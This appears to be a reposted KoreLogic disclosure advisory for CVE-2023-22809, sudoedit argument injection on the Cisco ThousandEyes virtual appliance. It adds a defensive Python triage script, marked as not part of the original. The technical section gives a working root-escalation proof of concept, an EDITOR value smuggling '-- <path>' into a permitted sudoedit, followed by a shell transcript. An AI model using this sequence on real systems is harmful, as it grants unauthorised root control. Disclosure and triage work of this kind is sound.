## https://sploitus.com/exploit?id=1337DAY-ID-38980
Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit
Advisory ID: KL-001-2023-003
Publication Date: 2023.08.17
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt
1. Vulnerability Details
Affected Vendor: ThousandEyes
Affected Product: ThousandEyes Enterprise Agent Virtual Appliance
Affected Version: thousandeyes-va-64-18.04 0.218
Platform: Linux / Ubuntu 18.04
CWE Classification: CWE-1395: Dependency on Vulnerable Third-Party Component
CVE ID: CVE-2023-22809
2. Vulnerability Description
A known but unpatched vulnerability in 'sudoedit' (CVE-2023-22809) in the
sudo build shipped with the appliance, combined with a sudoers rule that
lets the 'thousandeyes' account run sudoedit without a password, permits
that low-privilege user to modify arbitrary files as root and
subsequently execute arbitrary commands as root.
3. Technical Description
The ThousandEyes Virtual Appliance is distributed with a sudo
configuration that lets the 'thousandeyes' account run a restricted
set of commands as root without providing the account password. One
of those commands is 'sudoedit /etc/hosts'. The sudo build on the
appliance is affected by CVE-2023-22809: sudoedit honours the
SUDO_EDITOR, VISUAL and EDITOR environment variables and, when the
variable contains a '--' followed by further arguments, treats those
arguments as additional files to open with root privileges. The
permitted edit of /etc/hosts can therefore be turned into a root-level
write to any file on the filesystem. This is a publicly known sudo
vulnerability (per https://seclists.org/oss-sec/2023/q1/42), but its
presence in the ThousandEyes Virtual Appliance had not been disclosed.
It allows full root-level compromise of the virtual appliance.
thousandeyes@thousandeyes-va:~$ id
uid=1000(thousandeyes) gid=1000(thousandeyes)
groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
thousandeyes@thousandeyes-va:~$ sudo -l
Matching Defaults entries for thousandeyes on thousandeyes-va:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User thousandeyes may run the following commands on thousandeyes-va:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va,
/bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop
te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start
te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart
te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig,
/usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,
/usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa,
/usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install
te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate,
/usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*
(root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump
Two entries in this output matter. First, /usr/local/bin/te-* (along
with /usr/bin/te-* and /usr/local/sbin/te-*) is executable as root with
no password. Second, although sudoedit is only permitted for /etc/hosts,
the vulnerable sudoedit accepts extra file arguments smuggled in through
EDITOR='vim -- <path>', so we can overwrite an arbitrary file as root.
The '(ALL : ALL) ALL' entry is of no use to an attacker who lacks the
account password; the NOPASSWD rules are the attack surface. We pick one
of the te-* scripts as the target, replace its contents with a line that
executes a shell, and then run it through the NOPASSWD rule:
thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
/usr/local/bin/te-set-config: Python script, ASCII text executable
thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts
sudoedit: --: editing files in a writable directory is not permitted
2 files to edit
sudoedit: /etc/hosts unchanged
thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
/usr/local/bin/te-set-config: ASCII text
thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config
/bin/bash
thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config
root@thousandeyes-va:~# id
uid=0(root) gid=0(root) groups=0(root)
root@thousandeyes-va:~#
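The following triage script is an added example and is not part of the
KoreLogic advisory or of the ThousandEyes product. It works on captured
output of 'sudo -V' and 'sudo -l', so it runs offline and needs no root.
It flags a sudo build in the range affected by CVE-2023-22809 (1.8.0
through 1.9.12p1) combined with a sudoers rule that allows sudoedit
without a password, approximates the check the fixed sudo applies to the
editor variable, and prints the sudoers mitigation from the upstream sudo
advisory, which is the stopgap relevant to section 4 below. The 'sudo -l'
sample is an abridged copy of the transcript above; the 'sudo -V' line is
constructed, since the advisory does not show it (Ubuntu 18.04 shipped
sudo 1.8.21p2).

```python
"""Offline triage for CVE-2023-22809 exposure (sudoedit editor-argument injection).

Added example; not code from the KoreLogic advisory or from ThousandEyes.
Affected sudo range and mitigation text follow the upstream sudo advisory.
"""
import re
import shlex

AFFECTED_MIN = (1, 8, 0, 0)
AFFECTED_MAX = (1, 9, 12, 1)   # 1.9.12p2 is the first release carrying the fix

# Constructed sample: the advisory does not show `sudo -V`; Ubuntu 18.04 ships 1.8.21p2.
SUDO_V_SAMPLE = "Sudo version 1.8.21p2\n"

# Abridged copy of the advisory's `sudo -l` transcript: a NOPASSWD sudoedit rule
# next to root-executable te-* wildcards is the combination that matters.
SUDO_L_SAMPLE = r"""Matching Defaults entries for thousandeyes on thousandeyes-va:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User thousandeyes may run the following commands on thousandeyes-va:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va,
        /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof,
        /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*
    (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump
"""


def parse_sudo_version(sudo_v_text):
    """(major, minor, patch, plevel) from the 'Sudo version X.Y.Z[pN]' line."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", sudo_v_text)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_affected(version):
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def parse_sudo_l_rules(sudo_l_text):
    """Return [(runas, nopasswd, command)] from the 'may run the following' block.

    sudo -l prints one rule per '(runas)' line and wraps long rules onto indented
    continuation lines; commands are comma-separated and a NOPASSWD:/PASSWD: tag
    applies to every command after it within the rule. Escaped commas inside a
    command argument are not handled here.
    """
    lines = sudo_l_text.splitlines()
    starts = [i for i, l in enumerate(lines) if "may run the following commands" in l]
    if not starts:
        return []
    rules = []
    for line in lines[starts[0] + 1:]:
        s = line.strip()
        if not s:
            continue
        if s.startswith("("):
            rules.append(s)
        elif rules:
            rules[-1] += " " + s
    parsed = []
    for rule in rules:
        m = re.match(r"\(([^)]*)\)\s*(.*)", rule)
        runas, nopasswd = m.group(1).strip(), False
        for cmd in m.group(2).split(","):
            cmd = cmd.strip()
            for tag, flag in (("NOPASSWD:", True), ("PASSWD:", False)):
                if cmd.startswith(tag):
                    nopasswd, cmd = flag, cmd[len(tag):].strip()
            if cmd:
                parsed.append((runas, nopasswd, cmd))
    return parsed


def nopasswd_sudoedit_targets(rules):
    """Paths a NOPASSWD sudoedit rule lets the user open as root ('*' = any)."""
    targets = []
    for _runas, nopasswd, cmd in rules:
        parts = cmd.split()
        if nopasswd and parts and parts[0] == "sudoedit":
            targets.append(" ".join(parts[1:]) or "*")
    return targets


def editor_value_rejected(value):
    """Approximates the check added in sudo 1.9.12p2: an editor variable whose
    argument list contains a bare '--' is refused, since sudoedit would otherwise
    treat everything after it as extra files to edit as root."""
    try:
        return "--" in shlex.split(value)
    except ValueError:
        return True


def mitigation_snippet(targets, alias="SUDOEDIT_RULES"):
    """sudoers lines from the upstream advisory: drop the editor variables for the
    permitted sudoedit commands so only the compiled-in default editor runs."""
    cmnds = ", ".join("sudoedit " + t for t in targets)
    return (f"Cmnd_Alias {alias} = {cmnds}\n"
            f'Defaults!{alias} env_delete+="SUDO_EDITOR VISUAL EDITOR"\n')


def triage(sudo_v_text, sudo_l_text):
    """Exploitable only when both hold: affected sudo build and a sudoedit rule
    reachable without the account password."""
    version = parse_sudo_version(sudo_v_text)
    targets = nopasswd_sudoedit_targets(parse_sudo_l_rules(sudo_l_text))
    return {
        "version": version,
        "version_affected": version_affected(version),
        "nopasswd_sudoedit_targets": targets,
        "exploitable": version_affected(version) and bool(targets),
    }


if __name__ == "__main__":
    result = triage(SUDO_V_SAMPLE, SUDO_L_SAMPLE)
    for key, val in result.items():
        print(f"{key}: {val}")
    if result["exploitable"]:
        print("\nsudoers mitigation until sudo is upgraded:\n"
              + mitigation_snippet(result["nopasswd_sudoedit_targets"]), end="")
```

The env_delete mitigation only covers the sudoedit commands named in
the alias and is a stopgap; upgrading sudo to 1.9.12p2 or later is the
fix. Note also that a NOPASSWD rule for a wildcard such as
/usr/local/bin/te-* turns any root-level file write into root-level
code execution, which is why the two rules together, not sudoedit
alone, give the attacker a root shell here.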
4. Mitigation and Remediation Recommendation
The vendor has released an appliance version that remediates the
described vulnerability. Release notes are available at:
https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994
5. Credit
This vulnerability was discovered by Jim Becher of
KoreLogic, Inc.
6. Disclosure Timeline
2023.04.26 - KoreLogic submits vulnerability details to Cisco.
2023.04.26 - Cisco acknowledges receipt and the intention to
investigate.
2023.05.04 - Cisco notifies KoreLogic that a remediation for this
vulnerability is expected to be available within
90 days.
2023.06.30 - 45 business days have elapsed since KoreLogic reported
this vulnerability to the vendor.
2023.07.11 - Cisco informs KoreLogic that the issue has been
remediated in the latest ThousandEyes Virtual
Appliance and a Third Party Software Release Note
Enclosure will be released 2023.08.16. Cisco
provides CVE-2023-22809 to track this vulnerability.
2023.07.24 - 60 business days have elapsed since KoreLogic reported
this vulnerability to the vendor.
2023.08.16 - Cisco public acknowledgement.
2023.08.17 - KoreLogic public disclosure.
7. Proof of Concept
See 3. Technical Description.
The contents of this advisory are copyright(c) 2023
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/